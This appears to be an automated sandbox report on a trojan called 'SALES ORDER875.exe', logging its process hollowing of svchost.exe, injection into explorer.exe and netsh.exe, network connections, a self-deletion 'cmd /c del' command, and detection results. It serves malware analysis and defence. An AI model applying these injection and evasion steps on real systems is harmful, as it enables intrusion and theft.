Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]	1_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]	1_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]	1_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]	1_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]	1_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]	1_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]	1_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240A5B mov eax, dword ptr fs:[00000030h]	1_2_03240A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240A5B mov eax, dword ptr fs:[00000030h]	1_2_03240A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03238AA0 mov eax, dword ptr fs:[00000030h]	1_2_03238AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03238AA0 mov eax, dword ptr fs:[00000030h]	1_2_03238AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03286AA4 mov eax, dword ptr fs:[00000030h]	1_2_03286AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]	1_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]	1_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]	1_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]	1_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]	1_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]	1_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]	1_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]	1_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]	1_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03304A80 mov eax, dword ptr fs:[00000030h]	1_2_03304A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03268A90 mov edx, dword ptr fs:[00000030h]	1_2_03268A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326AAEE mov eax, dword ptr fs:[00000030h]	1_2_0326AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326AAEE mov eax, dword ptr fs:[00000030h]	1_2_0326AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03286ACC mov eax, dword ptr fs:[00000030h]	1_2_03286ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03286ACC mov eax, dword ptr fs:[00000030h]	1_2_03286ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03286ACC mov eax, dword ptr fs:[00000030h]	1_2_03286ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03230AD0 mov eax, dword ptr fs:[00000030h]	1_2_03230AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03264AD0 mov eax, dword ptr fs:[00000030h]	1_2_03264AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03264AD0 mov eax, dword ptr fs:[00000030h]	1_2_03264AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B892A mov eax, dword ptr fs:[00000030h]	1_2_032B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032C892B mov eax, dword ptr fs:[00000030h]	1_2_032C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AE908 mov eax, dword ptr fs:[00000030h]	1_2_032AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AE908 mov eax, dword ptr fs:[00000030h]	1_2_032AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032BC912 mov eax, dword ptr fs:[00000030h]	1_2_032BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03228918 mov eax, dword ptr fs:[00000030h]	1_2_03228918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03228918 mov eax, dword ptr fs:[00000030h]	1_2_03228918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03256962 mov eax, dword ptr fs:[00000030h]	1_2_03256962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03256962 mov eax, dword ptr fs:[00000030h]	1_2_03256962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03256962 mov eax, dword ptr fs:[00000030h]	1_2_03256962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0327096E mov eax, dword ptr fs:[00000030h]	1_2_0327096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0327096E mov edx, dword ptr fs:[00000030h]	1_2_0327096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0327096E mov eax, dword ptr fs:[00000030h]	1_2_0327096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032D4978 mov eax, dword ptr fs:[00000030h]	1_2_032D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032D4978 mov eax, dword ptr fs:[00000030h]	1_2_032D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032BC97C mov eax, dword ptr fs:[00000030h]	1_2_032BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B0946 mov eax, dword ptr fs:[00000030h]	1_2_032B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03304940 mov eax, dword ptr fs:[00000030h]	1_2_03304940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]	1_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]	1_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]	1_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]	1_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]	1_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]	1_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]	1_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]	1_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]	1_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]	1_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]	1_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]	1_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]	1_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032309AD mov eax, dword ptr fs:[00000030h]	1_2_032309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032309AD mov eax, dword ptr fs:[00000030h]	1_2_032309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B89B3 mov esi, dword ptr fs:[00000030h]	1_2_032B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B89B3 mov eax, dword ptr fs:[00000030h]	1_2_032B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B89B3 mov eax, dword ptr fs:[00000030h]	1_2_032B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032BE9E0 mov eax, dword ptr fs:[00000030h]	1_2_032BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032629F9 mov eax, dword ptr fs:[00000030h]	1_2_032629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032629F9 mov eax, dword ptr fs:[00000030h]	1_2_032629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032C69C0 mov eax, dword ptr fs:[00000030h]	1_2_032C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032649D0 mov eax, dword ptr fs:[00000030h]	1_2_032649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032FA9D3 mov eax, dword ptr fs:[00000030h]	1_2_032FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]	1_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]	1_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]	1_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03252835 mov ecx, dword ptr fs:[00000030h]	1_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]	1_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]	1_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326A830 mov eax, dword ptr fs:[00000030h]	1_2_0326A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032D483A mov eax, dword ptr fs:[00000030h]	1_2_032D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032D483A mov eax, dword ptr fs:[00000030h]	1_2_032D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032BC810 mov eax, dword ptr fs:[00000030h]	1_2_032BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032BE872 mov eax, dword ptr fs:[00000030h]	1_2_032BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032BE872 mov eax, dword ptr fs:[00000030h]	1_2_032BE872

Source: C:\Users\user\Desktop\SALES ORDER875.exe

Code function: 0_2_003E0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_003E0B62

Source: C:\Windows\SysWOW64\svchost.exe

Process token adjusted: Debug

System process connects to network (likely due to code injection or exploit)

Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_003B2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_003B2622
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_003A083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_003A083F
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_003A09D5 SetUnhandledExceptionFilter,	0_2_003A09D5
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_003A0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_003A0C21
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_015696E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_015696E0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_01569930 SetUnhandledExceptionFilter,	4_2_01569930

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe	Network Connect: 199.59.243.227 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 216.239.32.52 80			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\SALES ORDER875.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\svchost.exe	Thread register set: target process: 2580			Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Thread register set: target process: 2580			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\svchost.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Sample uses process hollowing technique

Source: C:\Windows\SysWOW64\svchost.exe

Section unmapped: C:\Windows\SysWOW64\netsh.exe base address: 1560000

Writes to foreign memory regions

Source: C:\Users\user\Desktop\SALES ORDER875.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 5E8008

Source: C:\Users\user\Desktop\SALES ORDER875.exe

0_2_003E1201

Source: C:\Users\user\Desktop\SALES ORDER875.exe

Code function: 0_2_003C2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_003C2BA5

Source: C:\Users\user\Desktop\SALES ORDER875.exe

Code function: 0_2_003EB226 SendInput,keybd_event,

0_2_003EB226

Source: C:\Users\user\Desktop\SALES ORDER875.exe

Code function: 0_2_004022DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

0_2_004022DA

Source: C:\Users\user\Desktop\SALES ORDER875.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SALES ORDER875.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"			Jump to behavior

Source: C:\Users\user\Desktop\SALES ORDER875.exe

0_2_003E0B62

Source: C:\Users\user\Desktop\SALES ORDER875.exe

Code function: 0_2_003E1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_003E1663

Source: SALES ORDER875.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: SALES ORDER875.exe, explorer.exe, 00000003.00000003.3114628168.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4125666132.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1844128294.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000002.4125666132.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1839441117.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000003.00000002.4125188674.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1839005711.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman$
Source: explorer.exe, 00000003.00000002.4125666132.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1839441117.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000003.00000002.4125666132.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1839441117.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\SALES ORDER875.exe

Code function: 0_2_003A0698 cpuid

0_2_003A0698

Source: C:\Users\user\Desktop\SALES ORDER875.exe

Code function: 0_2_003F8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,

0_2_003F8195

Source: C:\Users\user\Desktop\SALES ORDER875.exe

Code function: 0_2_003DD27A GetUserNameW,

0_2_003DD27A

Source: C:\Users\user\Desktop\SALES ORDER875.exe

Code function: 0_2_003BBB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_003BBB6F

Source: C:\Users\user\Desktop\SALES ORDER875.exe

Code function: 0_2_003842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

Uses netsh to modify the Windows network and firewall settings

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"

Stealing of Sensitive Information

Source: Yara match	File source: 1.2.svchost.exe.6b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SALES ORDER875.exe.2340000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SALES ORDER875.exe.2340000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4124920837.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4125151354.0000000000600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1898494781.0000000003100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1832217978.0000000002340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4125211297.0000000000630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1898295736.0000000000870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1898140559.00000000006B1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

Source: SALES ORDER875.exe	Binary or memory string: WIN_81
Source: SALES ORDER875.exe	Binary or memory string: WIN_XP
Source: SALES ORDER875.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: SALES ORDER875.exe	Binary or memory string: WIN_XPe
Source: SALES ORDER875.exe	Binary or memory string: WIN_VISTA
Source: SALES ORDER875.exe	Binary or memory string: WIN_7
Source: SALES ORDER875.exe	Binary or memory string: WIN_8

Remote Access Functionality

Source: Yara match	File source: 1.2.svchost.exe.6b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SALES ORDER875.exe.2340000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SALES ORDER875.exe.2340000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4124920837.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4125151354.0000000000600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1898494781.0000000003100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1832217978.0000000002340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4125211297.0000000000630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1898295736.0000000000870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1898140559.00000000006B1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_00401204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		0_2_00401204
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_00401806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00401806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 Credential API Hooking	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Shared Modules	2 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Credential API Hooking	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	2 Valid Accounts	2 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	21 Input Capture	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	215 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	612 Process Injection	1 Rootkit	LSA Secrets	341 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Valid Accounts	Cached Domain Credentials	12 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	612 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
SALES ORDER875.exe	55%	ReversingLabs	Win32.Trojan.AutoitInject
SALES ORDER875.exe	100%	Avira	DR/AutoIt.Gen8
SALES ORDER875.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://aka.ms/odirmr	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	0%	URL Reputation	safe
https://api.msn.com:443/v1/news/Feed/Windows?	0%	URL Reputation	safe
https://excel.office.com	0%	URL Reputation	safe
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark	0%	URL Reputation	safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	0%	URL Reputation	safe
https://wns.windows.com/L	0%	URL Reputation	safe
https://word.office.com	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	0%	URL Reputation	safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark	0%	URL Reputation	safe
https://www.rd.com/list/polite-habits-campers-dislike/	0%	URL Reputation	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
https://outlook.com_	0%	URL Reputation	safe
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe	0%	URL Reputation	safe
https://powerpoint.office.comcember	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
